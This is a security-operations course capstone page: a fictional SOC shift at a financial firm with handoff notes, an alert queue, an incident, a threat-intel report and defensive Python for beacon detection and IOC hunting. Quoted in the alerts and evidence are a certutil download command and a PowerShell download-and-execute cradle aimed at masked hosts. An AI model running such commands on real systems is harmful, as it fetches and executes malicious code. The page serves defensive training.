CSY201 Week 12 Intermediate


Operating Systems & Security


Opening Framing: Putting It All Together

Over the past eleven weeks, you've built a comprehensive foundation in security operations. You've learned monitoring, detection, triage, incident response, threat intelligence, hunting, and automation. Now it's time to apply everything in a realistic scenario.

This capstone simulates a day in a Security Operations Center. You'll handle an alert queue, investigate incidents, make decisions under pressure, document your work, and produce deliverables that demonstrate professional competency.

The scenario is designed to test not just individual skills, but your ability to integrate them—triaging efficiently, investigating thoroughly, responding appropriately, and communicating clearly.

Key insight: Real SOC work requires integrating many skills simultaneously. This capstone demonstrates that integration.

Capstone Scenario: Acme Financial Services

You're a SOC analyst at Acme Financial Services, a mid-sized financial institution. It's Monday morning, and you're starting your shift.

Organization Profile:
- 2,500 employees
- Headquarters + 12 branch offices
- Customer-facing web applications
- Internal trading systems
- Regulated industry (financial services)

Security Stack:
- SIEM: Splunk Enterprise Security
- EDR: CrowdStrike Falcon
- Firewall: Palo Alto Networks
- Email: Microsoft 365 with Defender
- SOAR: Splunk SOAR

Your Role:
- Tier 1/2 SOC Analyst
- Shift: 8 AM - 4 PM
- Responsibilities: Alert triage, investigation, escalation

Current Situation:
- Weekend was quiet (automated systems only)
- Several alerts accumulated overnight
- One ongoing investigation from Friday (handed off)
- Threat intel report about financial sector targeting

Part 1: Shift Handoff Review

Review the handoff from the previous shift:

SHIFT HANDOFF - Sunday Night to Monday Morning
Analyst: Sarah Chen
Time: 2024-01-14 23:45 UTC

OPEN INCIDENTS:

INC-2024-0112: Suspicious PowerShell Activity
- Status: Under investigation
- Host: TRADE-WS-07 (Trading floor workstation)
- User: mrodriguez (Senior Trader)
- Summary: EDR detected encoded PowerShell execution
- Actions taken: 
  * Alert triaged, escalated to Tier 2
  * Memory dump collected
  * User notified, asked not to use system
- Next steps: Malware analysis of memory dump
- Priority: HIGH

ALERT QUEUE STATUS:
- 23 alerts pending triage
- Oldest alert: 6 hours
- Mix of EDR, firewall, and email alerts

ENVIRONMENTAL NOTES:
- Patch Tuesday updates rolling out this week
- Trading systems maintenance window: Tuesday 2-4 AM
- New threat intel: APT targeting financial sector (see TI-2024-0115)

ITEMS FOR INCOMING ANALYST:
1. Continue INC-2024-0112 investigation
2. Review TI-2024-0115 and check for related IOCs
3. Clear alert backlog - prioritize by severity

Your Task:

  1. Review the handoff notes
  2. Prioritize your work for the shift
  3. Document your shift plan

Part 2: Alert Triage Queue

Your alert queue contains the following alerts. Triage each one.

Alert 1: Failed Login Attempts

ALERT: Multiple Failed Logins
Time: 2024-01-15 02:34 UTC
Source: Active Directory
Target: VPN Gateway
Account: svc_backup
Failures: 47 in 10 minutes
Source IPs: 185.220.101.XX (Tor exit node)
Status: Failures only, no success

Alert 2: Malware Detection

ALERT: Malware Detected - Blocked
Time: 2024-01-15 05:12 UTC  
Source: Email Gateway
Recipient: jthompson@acme-financial.com
Subject: "Invoice #INV-29481 - Urgent Payment Required"
Attachment: Invoice_29481.xlsm
Detection: Emotet dropper (macro-based)
Action: Blocked, quarantined

Alert 3: Unusual Data Transfer

ALERT: Large Outbound Data Transfer
Time: 2024-01-15 03:45 UTC
Source Host: FILESVR-02 (HR File Server)
Destination: 104.21.XX.XX (Cloudflare IP - file sharing service)
Size: 2.3 GB
Protocol: HTTPS
User Context: Unknown (service account)

Alert 4: Suspicious Process

ALERT: Suspicious Process Execution
Time: 2024-01-15 06:58 UTC
Host: ACCT-WS-22 (Accounting workstation)
User: dlee (Accounts Payable Clerk)
Process: certutil.exe -urlcache -f http://XX.XX.XX.XX/update.exe
Parent: outlook.exe
EDR Action: Blocked execution

Alert 5: Policy Violation

ALERT: Unauthorized Software Installation
Time: 2024-01-15 07:30 UTC
Host: MKT-WS-15 (Marketing workstation)
User: kpatel (Marketing Manager)
Software: TeamViewer (remote access tool)
Policy: Unauthorized remote access software

Your Task:

For each alert, document:

Part 3: Incident Investigation

Continue the investigation of INC-2024-0112 from the handoff:

INCIDENT: INC-2024-0112
Title: Suspicious PowerShell Activity - Trading Workstation

TIMELINE (from previous investigation):
- 2024-01-12 16:45: User mrodriguez received email with link
- 2024-01-12 16:47: User clicked link, downloaded document
- 2024-01-12 16:48: Document opened, macro executed
- 2024-01-12 16:48: PowerShell spawned with encoded command
- 2024-01-12 16:49: EDR detected and alerted
- 2024-01-12 16:52: Alert triaged, escalated

EVIDENCE COLLECTED:
- Memory dump from TRADE-WS-07
- Email with original link
- Downloaded document (quarantined)
- EDR telemetry export

DECODED POWERSHELL COMMAND:
IEX (New-Object Net.WebClient).DownloadString('http://185.XX.XX.XX/stage2.ps1')

ADDITIONAL FINDINGS (your investigation):
- stage2.ps1 performs system reconnaissance
- Attempts to query Active Directory
- Beacons to 185.XX.XX.XX:443 every 60 seconds
- No lateral movement detected (yet)
- User has access to trading applications and financial data

Your Task:

  1. Complete the investigation timeline
  2. Identify all IOCs
  3. Map to MITRE ATT&CK techniques
  4. Determine scope of compromise
  5. Recommend containment actions
  6. Write incident report
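An added example, not from the course page: the 60-second beacon in the findings above is the kind of pattern a periodicity check over firewall logs can surface, and it also shows why the same host's ordinary browsing does not trigger. The log lines are constructed, and 203.0.113.45 stands in for the masked 185.XX.XX.XX address.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def build_log():
    """Constructed firewall log (not Acme data): one beaconing flow plus ordinary browsing."""
    lines = []
    t0 = datetime(2024, 1, 12, 16, 49)
    # TRADE-WS-07 -> placeholder C2, every 60 s with +/- 1 s of jitter, 12 connections
    for i, jitter in enumerate([0, 1, -1, 0, 1, 0, -1, 0, 0, 1, -1, 0]):
        ts = t0 + timedelta(seconds=60 * i + jitter)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%S} src=10.10.5.17 dst=203.0.113.45 dport=443 action=allow")
    # the same host browsing a normal site at irregular gaps
    for gap in [0, 7, 95, 130, 131, 400, 402, 900]:
        ts = t0 + timedelta(seconds=gap)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%S} src=10.10.5.17 dst=93.184.216.34 dport=443 action=allow")
    return lines


def parse(line):
    """Split one 'ts key=value ...' line into a timestamp and a (src, dst, dport) key."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.fromisoformat(ts), (fields["src"], fields["dst"], fields["dport"])


def find_beacons(lines, min_conns=8, max_cv=0.1):
    """Flag (src, dst, dport) flows whose inter-connection interval is near-constant.

    cv = stdev / mean of the gaps between connections. A beacon with small jitter
    scores well under 0.1; human-driven traffic has gaps that vary far more.
    """
    seen = defaultdict(list)
    for line in lines:
        ts, key = parse(line)
        seen[key].append(ts)
    hits = {}
    for key, stamps in seen.items():
        if len(stamps) < min_conns:      # too few samples to judge periodicity
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        m = mean(gaps)
        cv = pstdev(gaps) / m if m else float("inf")
        if cv <= max_cv:
            hits[key] = {"interval_s": round(m, 1), "cv": round(cv, 3), "count": len(stamps)}
    return hits
```

Raising `min_conns` or lowering `max_cv` trades missed slow or heavily jittered beacons for fewer false positives; tune against a day of known-good traffic before deploying.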

Part 4: Threat Intelligence Application

Review the new threat intelligence report:

THREAT INTELLIGENCE REPORT: TI-2024-0115
Title: FIN7 Campaign Targeting Financial Services
Classification: TLP:AMBER
Date: 2024-01-14

SUMMARY:
FIN7 threat group observed conducting active campaign against
financial services organizations in North America. Campaign
uses spearphishing with macro-enabled documents targeting
finance and trading departments.

TTPs OBSERVED:
- Initial Access: Spearphishing Attachment (T1566.001)
- Execution: PowerShell (T1059.001)
- Persistence: Scheduled Task (T1053.005)
- C2: Web Service (T1102)

IOCs:
IPs:
- 185.234.72.XX
- 91.219.236.XX
- 45.142.213.XX

Domains:
- secure-docs[.]finance
- invoice-portal[.]net
- payment-update[.]com

Hashes (SHA256):
- a1b2c3d4e5f6... (dropper)
- f6e5d4c3b2a1... (stage2)

RECOMMENDATIONS:
- Block IOCs at perimeter
- Hunt for related activity
- Brief high-risk users
- Increase monitoring of finance/trading systems

Your Task:

  1. Check if IOCs match INC-2024-0112
  2. Hunt for IOCs across environment
  3. Recommend detection rules
  4. Draft user awareness communication
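Added example (not the course's own code) for steps 1 and 2: refang the report's IOCs and hunt for them across constructed DNS, proxy and EDR log lines. The three domains are the ones listed in TI-2024-0115; the IP addresses and SHA256 values are placeholders (documentation-range IPs and hashes of labelled strings) because the report masks its own, and the hostnames are reused from the scenario.

```python
import hashlib
import re
from collections import defaultdict

# Constructed IOC set: domains from TI-2024-0115; IPs and hashes are placeholders, not the report's
TI_IOCS = {
    "domain": ["secure-docs[.]finance", "invoice-portal[.]net", "payment-update[.]com"],
    "ip": ["203.0.113.45", "198.51.100.23"],
    "sha256": [hashlib.sha256(b"constructed dropper").hexdigest(),
               hashlib.sha256(b"constructed stage2").hexdigest()],
}


def refang(value):
    """Undo common defanging so report IOCs compare equal to raw log values."""
    v = value.strip().lower()
    v = re.sub(r"^hxxp", "http", v)
    return v.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


# Constructed log lines from three sources (DNS, proxy, EDR); the first two mirror INC-2024-0112
LOG = [
    "2024-01-12T16:47:10 dns host=TRADE-WS-07 query=secure-docs.finance",
    "2024-01-12T16:48:02 proxy host=TRADE-WS-07 dst=203.0.113.45:443 url=http://203.0.113.45/stage2.ps1",
    "2024-01-15T05:12:00 edr host=MAIL-GW sha256=" + hashlib.sha256(b"constructed dropper").hexdigest()
    + " action=quarantined",
    "2024-01-15T08:01:44 dns host=MKT-WS-15 query=www.example.com",
    "2024-01-15T08:03:19 dns host=ACCT-WS-22 query=SECURE-DOCS.FINANCE",
]

TOKEN = re.compile(r"[\w.\-]+")   # splits on ':', '/', '=' so IPs and hashes come out whole


def build_index(iocs):
    """Map every normalized IOC value to its type for constant-time lookups."""
    return {refang(v): kind for kind, vals in iocs.items() for v in vals}


def hunt(lines, iocs):
    """Return IOC -> list of (timestamp, source, host) for every line that contains it."""
    index = build_index(iocs)
    hits = defaultdict(list)
    for line in lines:
        ts, source, rest = line.split(" ", 2)
        host = re.search(r"host=(\S+)", rest).group(1)
        for tok in set(TOKEN.findall(rest.lower())):   # set: count each line once per IOC
            if tok in index:
                hits[tok].append((ts, source, host))
    return dict(hits)
```

A second host (ACCT-WS-22) resolving the same domain is exactly the kind of result that widens the scope of INC-2024-0112 and belongs in the handoff notes.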

Part 5: Deliverables

Your capstone submission must include:

1. Shift Plan (10 points)

2. Alert Triage Report (20 points)

3. Incident Investigation Report (30 points)

4. Threat Intelligence Response (20 points)

5. Shift Handoff Notes (10 points)

6. Reflection (10 points)

Evaluation Criteria

Your capstone will be evaluated on:

Criteria                                                  Points
Triage Accuracy: Correct classifications and priorities       20
Investigation Depth: Thorough analysis with evidence          25
Threat Intel Application: Effective use of intelligence       15
Documentation Quality: Clear, complete, professional          20
Decision Making: Sound judgment in recommendations            10
Reflection Quality: Thoughtful self-assessment                10

Total: 100 points. Projects scoring 80+ demonstrate job-ready competency.

Tips for Success

Time Management:
- Allocate time before starting
- Don't get stuck on one alert
- Leave time for documentation

Prioritization:
- High impact + high confidence = highest priority
- Consider business context
- Document your reasoning

Investigation:
- Follow the evidence
- Don't assume—verify
- Map to ATT&CK as you go

Documentation:
- Write as you work, not after
- Be specific and factual
- Include evidence for conclusions

Professionalism:
- Write for your audience
- Be clear and concise
- Proofread before submission

Week 12 Outcome Check

By completing this capstone, you will have demonstrated:

Congratulations! Completing this capstone demonstrates you have the skills expected of an entry-level SOC analyst.

🛡️ Capstone Extension: Harden & Defend

Enterprise SOCs do more than investigate. They harden systems, deploy detection, and document baselines for future response.

Deliverable: Hardening checklist + monitoring plan + runbook summary.

🎯 Hands-On Labs (Free & Essential)

Run a full SOC simulation before moving to reading resources.

🎮 TryHackMe: SOC Level 1

What you'll do: Triage alerts, investigate evidence, and make response decisions.
Why it matters: This mirrors day-to-day SOC analyst work.
Time estimate: 2-3 hours

Start TryHackMe SOC Level 1 →

📝 Lab Exercise: SOC Shift Report

Task: Produce a shift report with triage log, incident timeline, and executive summary.
Deliverable: One report that combines findings, actions, and recommendations.
Why it matters: Clear reporting is as critical as the investigation.
Time estimate: 1.5-2 hours

🎮 TryHackMe: SOC Level 2 (Stretch)

What you'll do: Tackle harder scenarios with deeper investigation steps.
Why it matters: Stretching here prepares you for real-world escalation.
Time estimate: 2-3 hours

Start TryHackMe SOC Level 2 →

🛡️ Lab: Hardening + Monitoring Extension

What you'll do: Complete the hardening and monitoring tasks defined above.
Deliverable: Baseline checklist + SIEM/EDR coverage plan + runbook summary.
Why it matters: Strong baselines reduce alert noise and improve response speed.
Time estimate: 2-3 hours

💡 Lab Tip: Treat documentation as part of the response, not an afterthought.

Resources

Reference these resources as you complete your capstone.

Week 12 Quiz

Test your understanding of SOC workflow integration and capstone decision-making.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Final Reflection

Reflection Prompt (400-500 words):

This capstone represents the culmination of your security operations journey in CSY201. You've progressed from understanding SOC concepts to performing analyst work in a realistic scenario.

Reflect on these questions:

A strong final reflection will honestly assess your growth, identify areas for continued learning, and articulate your career direction.

What's Next?

Completing CSY201 opens doors to specialized security topics:

Certifications to Consider:

Congratulations on completing CSY201! You now have a solid foundation in security operations—one of the most in-demand areas of cybersecurity. SOC skills are immediately applicable and highly valued. The monitoring, detection, investigation, and response capabilities you've developed will serve you throughout your security career. Keep learning, keep practicing, and welcome to the blue team!
